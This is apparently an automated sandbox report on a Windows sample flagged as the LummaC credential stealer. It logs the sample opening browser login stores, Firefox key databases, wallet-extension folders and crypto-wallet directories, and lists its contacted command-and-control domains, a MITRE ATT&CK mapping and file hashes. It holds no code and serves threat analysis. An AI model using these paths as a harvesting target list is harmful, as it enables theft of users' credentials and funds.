Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV	Jump to behavior

Source: Yara match

File source: Process Memory Space: VoGtelkHSn.exe PID: 5444, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: VoGtelkHSn.exe PID: 5444, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	12 Virtualization/Sandbox Evasion	1 OS Credential Dumping	131 Security Software Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	12 Virtualization/Sandbox Evasion	Remote Desktop Protocol	31 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	2 Clipboard Data	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Software Packing	LSA Secrets	12 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
VoGtelkHSn.exe	42%	ReversingLabs	Win32.Trojan.Generic
VoGtelkHSn.exe	41%	Virustotal		Browse
VoGtelkHSn.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
strollheavengwu.shop	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
http://crt.rootca1.amazontrust.com/rootca1.cer0?	0%	URL Reputation	safe
https://strollheavengwu.shop/apiV	0%	Avira URL Cloud	safe
liabilitynighstjsko.shop	0%	Avira URL Cloud	safe
shortsvelventysjo.shop	0%	Avira URL Cloud	safe
tolerateilusidjukl.shop	0%	Avira URL Cloud	safe
incredibleextedwj.shop	0%	Avira URL Cloud	safe
shortsvelventysjo.shop	16%	Virustotal		Browse
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
https://strollheavengwu.shop/api	100%	Avira URL Cloud	malware
liabilitynighstjsko.shop	17%	Virustotal		Browse
tolerateilusidjukl.shop	14%	Virustotal		Browse
http://ocsp.rootca1.amazontrust.com0:	0%	Avira URL Cloud	safe
shatterbreathepsw.shop	0%	Avira URL Cloud	safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	0%	Avira URL Cloud	safe
demonstationfukewko.shop	0%	Avira URL Cloud	safe
incredibleextedwj.shop	14%	Virustotal		Browse
https://strollheavengwu.shop/apiV	10%	Virustotal		Browse
https://strollheavengwu.shop/apis	0%	Avira URL Cloud	safe
shatterbreathepsw.shop	17%	Virustotal		Browse
productivelookewr.shop	0%	Avira URL Cloud	safe
strollheavengwu.shop	0%	Avira URL Cloud	safe
demonstationfukewko.shop	18%	Virustotal		Browse
https://strollheavengwu.shop/apiC	0%	Avira URL Cloud	safe
https://strollheavengwu.shop/api	12%	Virustotal		Browse
https://strollheavengwu.shop/P	0%	Avira URL Cloud	safe
alcojoldwograpciw.shop	0%	Avira URL Cloud	safe
https://strollheavengwu.shop/	0%	Avira URL Cloud	safe
https://strollheavengwu.shop/	1%	Virustotal		Browse
productivelookewr.shop	16%	Virustotal		Browse
alcojoldwograpciw.shop	17%	Virustotal		Browse
strollheavengwu.shop	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
strollheavengwu.shop	172.67.163.209	true	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
incredibleextedwj.shop	true	14%, Virustotal, Browse Avira URL Cloud: safe	unknown
shortsvelventysjo.shop	true	16%, Virustotal, Browse Avira URL Cloud: safe	unknown
tolerateilusidjukl.shop	true	14%, Virustotal, Browse Avira URL Cloud: safe	unknown
liabilitynighstjsko.shop	true	17%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://strollheavengwu.shop/api	true	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
shatterbreathepsw.shop	true	17%, Virustotal, Browse Avira URL Cloud: safe	unknown
demonstationfukewko.shop	true	18%, Virustotal, Browse Avira URL Cloud: safe	unknown
productivelookewr.shop	true	16%, Virustotal, Browse Avira URL Cloud: safe	unknown
strollheavengwu.shop	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
alcojoldwograpciw.shop	true	17%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmp	false		high
https://strollheavengwu.shop/apiV	VoGtelkHSn.exe, 00000000.00000003.2047317168.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp	false	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	VoGtelkHSn.exe, 00000000.00000003.2081199530.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://upx.sf.net	Amcache.hve.4.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	VoGtelkHSn.exe, 00000000.00000003.2081199530.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	VoGtelkHSn.exe, 00000000.00000003.2070520942.0000000005567000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmp	false		high
https://strollheavengwu.shop/apis	VoGtelkHSn.exe, 00000000.00000003.2134203398.0000000002CBB000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000002.2298398690.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	VoGtelkHSn.exe, 00000000.00000003.2081199530.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	VoGtelkHSn.exe, 00000000.00000003.2081199530.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	VoGtelkHSn.exe, 00000000.00000003.2081199530.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	VoGtelkHSn.exe, 00000000.00000003.2081199530.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://strollheavengwu.shop/apiC	VoGtelkHSn.exe, 00000000.00000002.2298240964.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	VoGtelkHSn.exe, 00000000.00000003.2070520942.0000000005567000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmp	false		high
https://strollheavengwu.shop/P	VoGtelkHSn.exe, 00000000.00000003.2057403228.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://strollheavengwu.shop/	VoGtelkHSn.exe, 00000000.00000002.2298398690.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000002.2298240964.0000000002C42000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.163.209	strollheavengwu.shop	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1431970
Start date and time:	2024-04-26 05:43:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	VoGtelkHSn.exe renamed because original name is a hash value
Original Sample Name:	7f26737f63fcd5b7e2695f438e341075.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@2/5@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 94% Number of executed functions: 38 Number of non-executed functions: 101
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.208.16.94
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:43:58	API Interceptor	8x Sleep call for process: VoGtelkHSn.exe modified
05:44:24	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
172.67.163.209	o7b91j8vnJ.exe	Get hash	malicious	LummaC	Browse
	asbpKOngY0.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
strollheavengwu.shop	o7b91j8vnJ.exe	Get hash	malicious	LummaC	Browse	172.67.163.209
	http://myidealwedding.com.au	Get hash	malicious	BitRAT, HTMLPhisher	Browse	104.21.15.198
	iPUk65i3yI.exe	Get hash	malicious	LummaC	Browse	104.21.15.198
	asbpKOngY0.exe	Get hash	malicious	LummaC	Browse	172.67.163.209
	2FjvjcayaH.exe	Get hash	malicious	LummaC	Browse	104.21.15.198
	qrLdMv1QXG.exe	Get hash	malicious	LummaC	Browse	104.21.15.198
	file.exe	Get hash	malicious	LummaC	Browse	172.67.163.209
	LwnI84BBtb.exe	Get hash	malicious	LummaC	Browse	104.21.15.198
	file.exe	Get hash	malicious	LummaC	Browse	104.21.15.198

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	yX8787W7de.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.16.102
	https://cdp1.tracking.e360.salesforce.com/click?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiJhMzYwL3Byb2QvNTBhMGYyODg2ZTg4NDA3Y2I1ODUwYmRjOWQwZGIxZTUiLCJjcmVhdGlvbl90aW1lIjoxNzE0MDg4MzE4LCJtZXNzYWdlX2lkIjoiMGd4dnAwdGZzeWpiNm4yamRiMDRuYWd5IzcyNWE1YTc5LTgxYzQtNGM0Yy1iNmI1LTdmMTY0MTM2ZTE2NCIsImNoYW5uZWxfdHlwZSI6ImVtYWlsIiwiZXhwIjoxNzQ1NjI0MzE4LCJyZWRpcmVjdF91cmwiOiJodHRwczovL3ZtLmJyYWRlbnRvbmNjLmluZm8vP2VvdmlldWJyJnFyYz1yZW5lZS5zY2h3YXJ0ekBxci5jb20uYXUiLCJpbmRpdmlkdWFsX2lkIjoiODdiZTY3MTdlZjJmMThjYzI3YmMyMWQ4OTJhY2Q2NzAifQ.iusDS7mld4iiq9DDY82R1MJ9ToHxmMDW3SMbDENZOZQ	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	Payment Swift.doc	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	https://marinatitle.com	Get hash	malicious	Unknown	Browse	104.17.24.14
	ad.msi	Get hash	malicious	Latrodectus	Browse	172.67.219.28
	https://ndw5xvotehflt.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	104.21.53.38
	https://cnmxukx5efilc7lvlel.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	172.66.44.161
	https://m7qfa5ng4lp7.blob.core.windows.net/m7qfa5ng4lp7/1.html?4rKpnF7821CfLO43wsacrvmomp962ETPJQJTKIDNZNNV65316UFUY14332V14#14/43-7821/962-65316-14332	Get hash	malicious	Phisher	Browse	104.18.26.50
	https://bocmyw606y.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	172.66.44.172
	https://uporniacomnuvidx.z13.web.core.windows.net/index.html	Get hash	malicious	TechSupportScam	Browse	104.17.25.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.32374.20351.xlsx	Get hash	malicious	Unknown	Browse	172.67.163.209
	file.exe	Get hash	malicious	RisePro Stealer	Browse	172.67.163.209
	file.exe	Get hash	malicious	PureLog Stealer, RisePro Stealer, zgRAT	Browse	172.67.163.209
	SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe	Get hash	malicious	DBatLoader	Browse	172.67.163.209
	file.exe	Get hash	malicious	LummaC	Browse	172.67.163.209
	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse	172.67.163.209
	file.exe	Get hash	malicious	LummaC	Browse	172.67.163.209
	Iu4csQ2rwX.msi	Get hash	malicious	AsyncRAT	Browse	172.67.163.209
	o7b91j8vnJ.exe	Get hash	malicious	LummaC	Browse	172.67.163.209
	SHEOrder-10524.exe	Get hash	malicious	Remcos, DBatLoader	Browse	172.67.163.209

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_VoGtelkHSn.exe_f761c59d348b96dd452ab7afe8f633ac68302a8_1ce72faa_daaeda3a-c187-4474-9194-c28c6a83adde\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.998775519341568
Encrypted:	false
SSDEEP:	96:3/BgRX5QcsohqPx1yLFS3QXIDcQGc6GcEdcw30+HbHg/opAnQPxVg7TFOy4UOnx0:vBOX5QcEK0YCnBjxpF7zuiF1Z24IO8u
MD5:	EA60AE721C7CE19A750C25290AD839E5
SHA1:	0637A75E125A5BA94B5E48B72379A32B269257CA
SHA-256:	B80B02D091A5CE32A22CEDC620E4342A5382766C7A003D19886D2A9CE257B724
SHA-512:	A9C37E4B82E6A48D2AFE08DC14E38E9767638EA39478A1DD61CEB4D4A8B87FB03AAA08ED49EFDDFFC717A40841AAFBB861866DDD8F852398CD9AD1366DAE88B3
